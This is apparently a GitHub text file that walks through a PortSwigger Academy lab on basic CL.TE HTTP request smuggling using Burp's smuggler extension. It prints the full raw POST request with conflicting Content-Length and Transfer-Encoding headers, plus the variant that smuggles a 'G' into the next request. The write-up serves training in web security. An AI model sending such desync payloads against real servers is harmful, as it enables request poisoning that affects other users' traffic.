-
Notifications
You must be signed in to change notification settings - Fork 2
/
HTTP request smuggling, basic CL.TE vulnerability.txt
53 lines (40 loc) · 2.07 KB
/
HTTP request smuggling, basic CL.TE vulnerability.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
HTTP request smuggling, basic CL.TE vulnerability
Welcome to request smuggling. Prepare to suffer.
Start by installing the HTTP Request Smuggling extension from the Burp store (Extender -> BApp Store -> HTTP Request Smuggler)
The demo provided by Burp is a bit out of date. Right click your GET request for the main page and "Launch Smuggle Probe".
The results will be available in the "Target" tab.
The first request generated should look like this:
POST / HTTP/1.1
Host: ac411f981f8ab81880de0f9f00830076.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Cookie: session=udGz2ggnMBfm4MyxVJKgK3p4ck7Ck9PU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
Transfer-Encoding: chunked
0
Send it to repeater and append a G at the end so that it looks like this:
POST / HTTP/1.1
Host: ac411f981f8ab81880de0f9f00830076.web-security-academy.net
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Connection: close
Cookie: session=udGz2ggnMBfm4MyxVJKgK3p4ck7Ck9PU
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked
0
G
Since this is a request smuggling, we'll have to send 2 requests to trigger the exploit. If we're right, the "G" should slip into the 2nd request.
Simply click send twice in repeater and you'll get a "Unrecognized method GPOST" error and a lab complete prompt. Good job!